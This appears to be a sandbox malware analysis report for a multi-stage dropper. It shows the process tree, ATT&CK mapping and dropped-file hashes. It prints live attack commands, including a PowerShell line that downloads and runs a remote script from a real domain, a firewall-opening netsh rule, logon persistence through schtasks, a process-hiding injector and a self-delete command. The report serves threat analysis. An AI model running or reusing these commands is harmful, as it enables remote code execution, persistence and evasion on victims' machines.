PID 4360 wrote to memory of 1040	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Resource.exe
PID 4360 wrote to memory of 3340	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	File.exe
PID 4360 wrote to memory of 3340	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	File.exe
PID 4360 wrote to memory of 3340	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	File.exe
PID 4360 wrote to memory of 2080	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Folder.exe
PID 4360 wrote to memory of 2080	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Folder.exe
PID 4360 wrote to memory of 2080	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Folder.exe
PID 4360 wrote to memory of 3472	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Files.exe
PID 4360 wrote to memory of 3472	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Files.exe
PID 4360 wrote to memory of 3472	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Files.exe
PID 4360 wrote to memory of 2560	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Proceed.exe
PID 4360 wrote to memory of 2560	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Proceed.exe
PID 4360 wrote to memory of 2560	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Proceed.exe
PID 4360 wrote to memory of 880	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Continue.exe
PID 4360 wrote to memory of 880	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Continue.exe
PID 4360 wrote to memory of 880	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Continue.exe
PID 4360 wrote to memory of 3196	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Info.exe
PID 4360 wrote to memory of 3196	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Info.exe
PID 4360 wrote to memory of 3196	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Info.exe
PID 3472 wrote to memory of 1292	3472	Files.exe	Files.tmp
PID 3472 wrote to memory of 1292	3472	Files.exe	Files.tmp
PID 3472 wrote to memory of 1292	3472	Files.exe	Files.tmp
PID 880 wrote to memory of 1416	880	Continue.exe	cmd.exe
PID 880 wrote to memory of 1416	880	Continue.exe	cmd.exe
PID 4360 wrote to memory of 3804	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	msedge.exe
PID 4360 wrote to memory of 3804	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	msedge.exe
PID 3804 wrote to memory of 3188	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3188	3804	msedge.exe	msedge.exe
PID 1292 wrote to memory of 1032	1292	Files.tmp	Files.exe
PID 1292 wrote to memory of 1032	1292	Files.tmp	Files.exe
PID 1292 wrote to memory of 1032	1292	Files.tmp	Files.exe
PID 2080 wrote to memory of 4752	2080		Folder.exe
PID 2080 wrote to memory of 4752	2080		Folder.exe
PID 2080 wrote to memory of 4752	2080		Folder.exe
PID 1416 wrote to memory of 4800	1416	cmd.exe	powershell.exe
PID 1416 wrote to memory of 4800	1416	cmd.exe	powershell.exe
PID 2560 wrote to memory of 4912	2560	Proceed.exe	vbc.exe
PID 2560 wrote to memory of 4912	2560	Proceed.exe	vbc.exe
PID 2560 wrote to memory of 4912	2560	Proceed.exe	vbc.exe
PID 2560 wrote to memory of 4912	2560	Proceed.exe	vbc.exe
PID 1032 wrote to memory of 4264	1032	Files.exe	Files.tmp
PID 1032 wrote to memory of 4264	1032	Files.exe	Files.tmp
PID 1032 wrote to memory of 4264	1032	Files.exe	Files.tmp
PID 2560 wrote to memory of 4912	2560	Proceed.exe	vbc.exe
PID 4264 wrote to memory of 4776	4264	Files.tmp	explorer.exe
PID 4264 wrote to memory of 4776	4264	Files.tmp	explorer.exe
PID 4264 wrote to memory of 4776	4264	Files.tmp	explorer.exe
PID 4264 wrote to memory of 4776	4264	Files.tmp	explorer.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe
PID 3804 wrote to memory of 3372	3804	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe
"C:\Users\Admin\AppData\Local\Temp\04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4360

C:\Users\Admin\AppData\Local\Temp\Resource.exe
"C:\Users\Admin\AppData\Local\Temp\Resource.exe"
2⤵
- Executes dropped EXE
PID:1040

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
PID:3340

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2440

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:2752

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:2444

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4368

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
5⤵
PID:4904

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3520

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:2080

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -q
3⤵
- Executes dropped EXE
PID:4752

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3472

C:\Users\Admin\AppData\Local\Temp\is-8E01L.tmp\Files.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8E01L.tmp\Files.tmp" /SL5="$101C8,5049048,960000,C:\Users\Admin\AppData\Local\Temp\Files.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1292

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe" /VERYSILENT
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1032

C:\Users\Admin\AppData\Local\Temp\is-FGUC0.tmp\Files.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FGUC0.tmp\Files.tmp" /SL5="$B003A,5049048,960000,C:\Users\Admin\AppData\Local\Temp\Files.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4264

C:\Windows\SysWOW64\explorer.exe
explorer.exe
6⤵
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 548
7⤵
- Program crash
PID:456

C:\Users\Admin\AppData\Local\Temp\Proceed.exe
"C:\Users\Admin\AppData\Local\Temp\Proceed.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 264
3⤵
- Program crash
PID:4320

C:\Users\Admin\AppData\Local\Temp\Continue.exe
"C:\Users\Admin\AppData\Local\Temp\Continue.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:880

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://nassarplastic.com/wp-content/config_20.ps1')"
3⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://nassarplastic.com/wp-content/config_20.ps1')
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Continue.exe" >> NUL
3⤵
PID:2684

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:5052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/1bxHA4
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8f1a746f8,0x7ff8f1a74708,0x7ff8f1a74718
3⤵
PID:3188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
3⤵
PID:3372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
3⤵
PID:3268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
3⤵
PID:4768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
3⤵
PID:2728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
3⤵
PID:220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
3⤵
PID:640

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
3⤵
PID:2136

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:4536

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff71a905460,0x7ff71a905470,0x7ff71a905480
4⤵
PID:3208

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
3⤵
PID:2468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
3⤵
PID:4200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,639141993176924802,1831705766168540880,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3400 /prefetch:2
3⤵
PID:1436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3196 -ip 3196
1⤵
PID:2072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4776 -ip 4776
1⤵
PID:220

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4436

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:4016

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 600
3⤵
- Program crash
PID:1328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4652 -ip 4652
1⤵
PID:1564

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2752

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
ec8ff3b1ded0246437b1472c69dd1811

SHA1
d813e874c2524e3a7da6c466c67854ad16800326

SHA256
e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

SHA512
e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
88cecfa5ef1d6bad9d35fbca65802b20

SHA1
5eeee9a1180fbc8123709050a05055580cbd5ded

SHA256
90bd18a11716ed9677ca74b3f4fc5bca569db8974ba791a959f2f3feaa05e20b

SHA512
126095857544dd104c62047c44039582ecbf1aa762d21f08eaa686e6e534437307330e294ad887837adb4d871df59e592a1df4ead2134fbe8714508c09982cb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
78c7656527762ed2977adf983a6f4766

SHA1
21a66d2eefcb059371f4972694057e4b1f827ce6

SHA256
e1000099751602ae1adcec6f1c74e1d65f472936817b45239dfed4b043984296

SHA512
0a8e58ae95163b3cdf8e81b5085887761e73cb7c836a1a6a972e837fb3df69b2ac70cfd6311d06d40656344ec35eb48e512f007561480f0345486ac2b329be0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
099b4ba2787e99b696fc61528100f83f

SHA1
06e1f8b7391e1d548e49a1022f6ce6e7aa61f292

SHA256
cdb1db488e260ed750edfe1c145850b57ee8ab819d75237a167e673116a33ee8

SHA512
4309375e10785564ceb03e0127ced414e366a5b833f16a60d796471d871b479e4c044db5268902d9dfd14715ca577cb26042bab8f7b0f31fe8abf33947feb9d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
dededa58a5f8660248c9ade364cae3bf

SHA1
a042ea9125d0309847d650a7765af2d117ccb983

SHA256
96d2f4739ae500f5fe380e28e7d59825f8ee395835ecbe64c352a6128821f0b9

SHA512
04f0adb7fe00ff7bb4a83090fd5458a37fa10d2ac4e0067b3e2ffbe28c03723f822e16b9121c2e76b41bbed2a94652e0e26356a4346d4e4e5db475907f2c4c13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
180B

MD5
8f571752a0c4f3f6020966e96c85ef8b

SHA1
81fa9c853712e71e4b0a7da1f65a0979e90a1236

SHA256
d0b6f0f7769d5faf34595b539d766fe475ec0a2f7a14d2b8f874ea7edf71319d

SHA512
517efe07dc09ac97deca70371d45628e01758fdf5acb2809cab374e27bfc9b36caa9b5740b43f4d22fbee417f36156ee2034b02d3b823a51ca9a50b197fbfc26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
201faf7723b0b9c6cb5745e13691e927

SHA1
01cfa58fc41f153b38bec97ac22c61e870bd3867

SHA256
5ed22370b76c8cdee050d4387e719586f8d2a84f378898ffaf1820a09daf2418

SHA512
eab30bb677b63aa8631912406144f1f36d78d4d514a055e4b8c5fbaed7ddade208772209375fc23c28d329b1f948747ea0e172e6f1b7d847059a657d1193d0f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
00096ab1e6b6881d26103c784257f945

SHA1
ccd86ae4a150f07a5b94795a29b4417f705df6f9

SHA256
c9a6b6b75aa58c16ca07f4acb7d68ebaa942ad3028dc6ca3167dc855d9659780

SHA512
cb69e43c8a4115d95b6c42cc796ba12142ebc6b4dfb9789ddd5bb2d535fb1e8c61f8fe90d1bbdda281d7421dfd51f28d5a716d09c7a60d50bf3df53752e2a486

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
80c00e6dfdcda983768765b8094a35af

SHA1
ed18cd72e470d6db0f979a2081844779375598f2

SHA256
69a6de34858830cdfc4f96a9b20c1c21edbcbe2269d50ad182df8e345b147070

SHA512
3da98b1adc9eb806683e5f2024b3961af75f534b1b36081dfcdcd416285a8d8bbc5be1ffd5aeeeb8a242261740246d9e3f892b6833895f79975adfabf686e62d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
02ee7addc9e8a2d07af55556ebf0ff5c

SHA1
020161bb64ecb7c6e6886ccc055908984dc651d8

SHA256
552d3ed359b7a52278ce621674d16428d8a7969f6cd5663df18e240cce66aadc

SHA512
567989543c3848a0c3276d96b96ca761f750e4b71fb74f36d809f590ffe16a72fd5ece251737a8b1ffe65f0051e211bd7ad19d2b8b0b7ca1b7ffc86dd2a52883

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
933d9dc4971ae7f29dae2c2c164b7eb4

SHA1
64dea791e9416eaceb414041e923be79bf3ec574

SHA256
2fd81ac35bf5478ae7272f9837a4850063623e4b8da664e0aa2bd0ea9935aed5

SHA512
